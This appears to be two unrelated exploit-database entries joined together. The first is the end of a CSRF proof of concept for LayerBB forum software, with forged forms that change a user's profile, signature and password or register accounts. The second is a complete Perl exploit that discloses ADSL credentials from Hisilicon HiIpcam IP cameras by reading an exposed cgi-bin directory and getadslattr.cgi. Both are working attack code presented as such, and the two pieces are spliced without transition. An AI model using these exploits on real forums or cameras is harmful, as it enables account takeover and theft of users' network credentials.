value="BT">Bhutan</option><option value="BV">Bouvet Island</option><option value="BW">Botswana</option><option value="BY">Belarus</option><option value="BZ">Belize</option><option value="CA">Canada</option><option value="CC">Cocos Islands</option><option value="CD">Congo (the Democratic Republic)</option><option value="CF">Central African Republic</option><option value="CG">Congo</option><option value="CH">Switzerland</option><option value="CI">Cote d'Ivoire</option><option value="CK">Cook Islands</option><option value="CL">Chile</option><option value="CM">Cameroon</option><option value="CN">China</option><option value="CO">Colombia</option><option value="CR">Costa Rica</option><option value="CU">Cuba</option><option value="CV">Cabo Verde</option><option value="CW">Curacao</option><option value="CX">Christmas Island</option><option value="CY">Cyprus</option><option value="CZ">Czech Republic</option><option value="DE">Germany</option><option value="DJ">Djibouti</option><option value="DK">Denmark</option><option value="DM">Dominica</option><option value="DO">Dominican Republic</option><option value="DZ">Algeria</option><option value="EC">Ecuador</option><option value="EE">Estonia</option><option value="EG">Egypt</option><option value="EH">Western Sahara</option><option value="ER">Eritrea</option><option value="ES">Spain</option><option value="ET">Ethiopia</option><option value="FI">Finland</option><option value="FJ">Fiji</option><option value="FK">Falkland Islands</option><option value="FM">Micronesia</option><option value="FO">Faroe Islands</option><option value="FR">France</option><option value="GA">Gabon</option><option value="GB">United Kingdom</option><option value="GD">Grenada</option><option value="GE">Georgia</option><option value="GF">French Guiana</option><option value="GG">Guernsey</option><option value="GH">Ghana</option><option value="GI">Gibraltar</option><option value="GL">Greenland</option><option value="GM">Gambia</option><option value="GN">Guinea</option><option value="GP">Guadeloupe</option><option value="GQ">Equatorial Guinea</option><option value="GR">Greece</option><option value="GS">South Georgia and the South Sandwich Islands</option><option value="GT">Guatemala</option><option value="GU">Guam</option><option value="GW">Guinea-Bissau</option><option value="GY">Guyana</option><option value="HK">Hong Kong</option><option value="HM">Heard Island and McDonald Islands</option><option value="HN">Honduras</option><option value="HR">Croatia</option><option value="HT">Haiti</option><option value="HU">Hungary</option><option value="ID">Indonesia</option><option value="IE">Ireland</option><option value="IL">Israel</option><option value="IM">Isle of Man</option><option value="IN">India</option><option value="I
<br>
<label for="birthday">Birthday</label>
<input type="text" name="birthday" id="birthday" value="0000-00-00">
<span id="helpBlock" class="help-block">In the format of: YYYY-MM-DD</span>
<label for="editor">About You</label><br>
<textarea name="about" id="editor" style="min-width: 100%; max-width: 100%; height: 150px;"></textarea>
<br>
<div class="panel panel-default">
<div class="panel-heading">Additional Profile Fields</div>
<div class="panel-body"></div>
</div>
<br>
<input type="submit" name="edit" value="Save Changes">
</form>
<!-- Edit Profile CSRF End -->

<!-- Edit Signature CSRF -->
<form id="LAYER_form" action="http://localhost/profile.php/cmd/signature" method="POST" style="padding: 25px;">
<label for="sig">Signature</label>
<textarea name="sig" id="editor" style="width: 100%; height: 300px; max-width: 100%; min-width: 100%;"></textarea>
<br><br>
<input type="submit" name="edit" value="Save Changes">
</form>
<!-- Edit Signature CSRF End -->

<!-- Change Password CSRF -->
<form id="LAYER_form" action="http://localhost/profile.php/cmd/password" method="POST" style="padding: 35px;">
<label for="current_password">Current Password</label>
<input type="password" name="current_password" id="current_password">
<label for="new_password">New Password</label>
<input type="password" name="new_password" id="new_password">
<br><br>
<input type="submit" name="edit" value="Save Changes">
</form>
<!-- Change Password CSRF End -->

<!-- Forgot Password CSRF -->
<form action="http://localhost/members.php/cmd/forgotpassword" method="POST" id="LAYER_form" style="padding: 25px;">
<label for="email">Email</label>
<input type="text" name="email" id="email" class="form-control">
<br><br>
<input type="submit" name="forget" value="Send Email" class="btn btn-default">
</form>
<!-- Forgot Password CSRF End -->

<!-- Reset Password CSRF -->
<form action="http://localhost/members.php/cmd/resetpassword" method="POST" id="LAYER_form" style="padding: 25px;">
<label for="password">Password</label>
<input type="password" name="password" id="password" class="form-control">
<label for="a_password">Confirm Password</label>
<input type="password" name="a_password" id="a_password" class="form-control">
<br><br>
<input type="submit" name="reset" value="Reset Password" class="btn btn-default">
</form>
<!-- Reset Password CSRF End -->

<!-- Register Account CSRF -->
<form action="http://localhost/members.php/cmd/register" method="POST" style="padding: 25px;">
<label for="username">Username</label>
<input type="text" name="username" value="" id="username" class="form-control">
<label for="password">Password</label>
<input type="password" name="password" id="password" class="form-control">
<label for="a_password">Confirm Password</label>
<input type="password" name="a_password" id="a_password" class="form-control">
<label for="email">Email</label>
<input type="text" name="email" value="" id="email" class="form-control">
<label for="LayerBB_captcha">Are you a bot?</label><br>
<img src="http://localhost/public/img/captcha.php" alt="LayerBB Captcha"><br><input type="text" id="LayerBB_captcha" name="LayerBB_captcha">
<br><br>
<input type="submit" name="register" value="Register" class="btn btn-default">
    By clicking "Register", you agree to abide by the forum rules located <a href="http://localhost/members.php/cmd/rules">here</a>.
</form>
<!-- Register Account CSRF End -->



3. Solution:
Update to 1.1.4

#!/usr/bin/perl -w
#
#  Hisilicon HiIpcam V100R003 Remote ADSL Credentials Disclosure
#
#  Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
#  #  [ 
#  #  [ Hisilicon HiIpcam V100R003 Remote ADSL Credentials Disclosure
#  #  [ =============================================================
#  #  [ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com>
#  #  [
#  #  [  Disclaimer:
#  #  [  This or previous programs are for Educational purpose
#  #  [  ONLY. Do not use it without permission. The usual 
#  #  [  disclaimer applies, especially the fact that Todor Donev
#  #  [  is not liable for any damages caused by direct or 
#  #  [  indirect use of the  information or functionality provided
#  #  [  by these programs. The author or any Internet provider 
#  #  [  bears NO responsibility for content or misuse of these 
#  #  [  programs or any derivatives thereof. By using these programs 
#  #  [  you accept the fact that any damage (dataloss, system crash, 
#  #  [  system compromise, etc.) caused by the use  of these programs
#  #  [  are not Todor Donev's responsibility.
#  #  [   
#  #  [ Use them at your own risk!
#  #  [
#  #  [ Initializing the browser
#  #  [ Server: thttpd/2.25b 29dec2003
#  #  [ The target is vulnerable
#  #  [
#  #  [ Directory Traversal
#  #  [
#  #  [ /cgi-bin/..
#  #  [ /cgi-bin/adsl_init.cgi
#  #  [ /cgi-bin/chkwifi.cgi
#  #  [ /cgi-bin/ddns_start.cgi
#  #  [ /cgi-bin/getadslattr.cgi
#  #  [ /cgi-bin/getddnsattr.cgi
#  #  [ /cgi-bin/getinetattr.cgi
#  #  [ /cgi-bin/getinterip.cgi
#  #  [ /cgi-bin/getnettype.cgi
#  #  [ /cgi-bin/getupnp.cgi
#  #  [ /cgi-bin/getwifi.cgi
#  #  [ /cgi-bin/getwifiattr.cgi
#  #  [ /cgi-bin/ptzctrldown.cgi
#  #  [ /cgi-bin/ptzctrlleft.cgi
#  #  [ /cgi-bin/ptzctrlright.cgi
#  #  [ /cgi-bin/ptzctrlup.cgi
#  #  [ /cgi-bin/ptzctrlzoomin.cgi
#  #  [ /cgi-bin/ptzctrlzoomout.cgi
#  #  [ /cgi-bin/ser.cgi
#  #  [ /cgi-bin/setadslattr.cgi
#  #  [ /cgi-bin/setddnsattr.cgi
#  #  [ /cgi-bin/setinetattr.cgi
#  #  [ /cgi-bin/setwifiattr.cgi
#  #  [ /cgi-bin/testwifi.cgi
#  #  [ /cgi-bin/upnp_start.cgi
#  #  [ /cgi-bin/upnp_stop.cgi
#  #  [ /cgi-bin/wifi_start.cgi
#  #  [ /cgi-bin/wifi_stop.cgi
#  #  [ 
#  #  [ File Reading
#  #  [
#  #  [ var ip = "" ;
#  #  [ var adslenable = "" ;
#  #  [ var username = "hacker" ;
#  #  [ var password = "133337" ;
#  #  [ var dnsauto = "1" ;
#  #  [ var dns1 = "8.8.8.8" ;
#  #  [ var dns2 = "8.8.4.4" ;
#
# 
use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use HTML::TreeBuilder;
$| = 1;
my $host = shift || 'https://192.168.1.1/'; # Full path url to the store
print "\033[2J";    #clear the screen
print "\033[0;0H"; #jump to 0,0

my $banner =  "\x5b\x20\x0a\x5b\x20\x48\x69\x73\x69\x6c\x69\x63\x6f\x6e\x20\x48\x69\x49\x70\x63\x61\x6d\x20\x56\x31\x30\x30\x52\x30\x30\x33\x20\x52\x65\x6d\x6f\x74\x65\x20\x41\x44\x53\x4c\x20\x43\x72\x65\x64\x65\x6e\x74\x69\x61\x6c\x73\x20\x44\x69\x73\x63\x6c\x6f\x73\x75\x72\x65\x0a\x5b\x20\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x0a\x5b\x20\x45\x78\x70\x6c\x6f\x69\x74\x20\x41\x75\x74\x68\x6f\x72\x3a\x20\x54\x6f\x64\x6f\x72\x20\x44\x6f\x6e\x65\x76\x20\x32\x30\x31\x39\x20\x3c\x74\x6f\x64\x6f\x72\x2e\x64\x6f\x6e\x65\x76\x40\x67\x6d\x61\x69\x6c\x2e\x63\x6f\x6d\x3e\x0a\x5b\x0a\x5b\x20\x20\x44\x69\x73\x63\x6c\x61\x69\x6d\x65\x72\x3a\x0a\x5b\x20\x20\x54\x68\x69\x73\x20\x6f\x72\x20\x70\x72\x65\x76\x69\x6f\x75\x73\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x20\x61\x72\x65\x20\x66\x6f\x72\x20\x45\x64\x75\x63\x61\x74\x69\x6f\x6e\x61\x6c\x20\x70\x75\x72\x70\x6f\x73\x65\x0a\x5b\x20\x20\x4f\x4e\x4c\x59\x2e\x20\x44\x6f\x20\x6e\x6f\x74\x20\x75\x73\x65\x20\x69\x74\x20\x77\x69\x74\x68\x6f\x75\x74\x20\x70\x65\x72\x6d\x69\x73\x73\x69\x6f\x6e\x2e\x20\x54\x68\x65\x20\x75\x73\x75\x61\x6c\x20\x0a\x5b\x20\x20\x64\x69\x73\x63\x6c\x61\x69\x6d\x65\x72\x20\x61\x70\x70\x6c\x69\x65\x73\x2c\x20\x65\x73\x70\x65\x63\x69\x61\x6c\x6c\x79\x20\x74\x68\x65\x20\x66\x61\x63\x74\x20\x74\x68\x61\x74\x20\x54\x6f\x64\x6f\x72\x20\x44\x6f\x6e\x65\x76\x0a\x5b\x20\x20\x69\x73\x20\x6e\x6f\x74\x20\x6c\x69\x61\x62\x6c\x65\x20\x66\x6f\x72\x20\x61\x6e\x79\x20\x64\x61\x6d\x61\x67\x65\x73\x20\x63\x61\x75\x73\x65\x64\x20\x62\x79\x20\x64\x69\x72\x65\x63\x74\x20\x6f\x72\x20\x0a\x5b\x20\x20\x69\x6e\x64\x69\x72\x65\x63\x74\x20\x75\x73\x65\x20\x6f\x66\x20\x74\x68\x65\x20\x20\x69\x6e\x66\x6f\x72\x6d\x61\x74\x69\x6f\x6e\x20\x6f\x72\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x61\x6c\x69\x74\x79\x20\x70\x72\x6f\x76\x69\x64\x65\x64\x0a\x5b\x20\x20\x62\x79\x20\x74\x68\x65\x73\x65\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x2e\x20\x54\x68\x65\x20\x61\x75\x74\x68\x6f\x72\x20\x6f\x72\x20\x61\x6e\x79\x20\x49\x6e\x74\x65\x72\x6e\x65\x74\x20\x70\x72\x6f\x76\x69\x64\x65\x72\x20\x0a\x5b\x20\x20\x62\x65\x61\x72\x73\x20\x4e\x4f\x20\x72\x65\x73\x70\x6f\x6e\x73\x69\x62\x69\x6c\x69\x74\x79\x20\x66\x6f\x72\x20\x63\x6f\x6e\x74\x65\x6e\x74\x20\x6f\x72\x20\x6d\x69\x73\x75\x73\x65\x20\x6f\x66\x20\x74\x68\x65\x73\x65\x20\x0a\x5b\x20\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x20\x6f\x72\x20\x61\x6e\x79\x20\x64\x65\x72\x69\x76\x61\x74\x69\x76\x65\x73\x20\x74\x68\x65\x72\x65\x6f\x66\x2e\x20\x42\x79\x20\x75\x73\x69\x6e\x67\x20\x74\x68\x65\x73\x65\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x20\x0a\x5b\x20\x20\x79\x6f\x75\x20\x61\x63\x63\x65\x70\x74\x20\x74\x68\x65\x20\x66\x61\x63\x74\x20\x74\x68\x61\x74\x20\x61\x6e\x79\x20\x64\x61\x6d\x61\x67\x65\x20\x28\x64\x61\x74\x61\x6c\x6f\x73\x73\x2c\x20\x73\x79\x73\x74\x65\x6d\x20\x63\x72\x61\x73\x68\x2c\x20\x0a\x5b\x20\x20\x73\x79\x73\x74\x65\x6d\x20\x63\x6f\x6d\x70\x72\x6f\x6d\x69\x73\x65\x2c\x20\x65\x74\x63\x2e\x29\x20\x63\x61\x75\x73\x65\x64\x20\x62\x79\x20\x74\x68\x65\x20\x75\x73\x65\x20\x20\x6f\x66\x20\x74\x68\x65\x73\x65\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x0a\x5b\x20\x20\x61\x72\x65\x20\x6e\x6f\x74\x20\x54\x6f\x64\x6f\x72\x20\x44\x6f\x6e\x65\x76\x27\x73\x20\x72\x65\x73\x70\x6f\x6e\x73\x69\x62\x69\x6c\x69\x74\x79\x2e\x0a\x5b\x20\x20\x20\x0a\x5b\x20\x55\x73\x65\x20\x74\x68\x65\x6d\x20\x61\x74\x20\x79\x6f\x75\x72\x20\x6f\x77\x6e\x20\x72\x69\x73\x6b\x21\x0a\x5b\x0a";

print $banner;

print "[ e.g. perl $0 https://target:port/\n" and exit if ($host !~ m/^http/);
print "[ Initializing the browser\n";
my $user_agent = rand_ua("browsers");
my $browser  = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
   $browser->timeout(30);
   $browser->agent($user_agent);
my $target = $host."/cgi-bin/";
my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);                      
my $response = $browser->request($request) or die "[ Exploit Failed: $!";
print "[ 401 Unauthorized!\n" and exit if ($response->code eq '401');
print "[ Server: ", $response->header('Server'), "\n";
if (defined ($response->as_string()) && ($response->as_string() =~ m/<H2>Index of \/cgi-bin\/<\/H2>/)){
    print "[ The target is vulnerable\n";
    print "[\n[ Directory Traversal\n";
    my $tree = HTML::TreeBuilder->new_from_content($response->as_string());
    my @files = $tree->look_down(_tag => 'a');
    print "[ ", $_->attr('href'), "\n" for @files;
    my $target = $host."/cgi-bin/getadslattr.cgi";
    my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);
    my $response = $browser->request($request) or die "[ Exploit Failed: $!";
    print "[\n[ File Reading\n";
    print "[ ", $_, "\n" for split(/\n/,$response->content());

} else { 
        print "[ Exploit failed! The target isn't vulnerable\n";
        exit;
}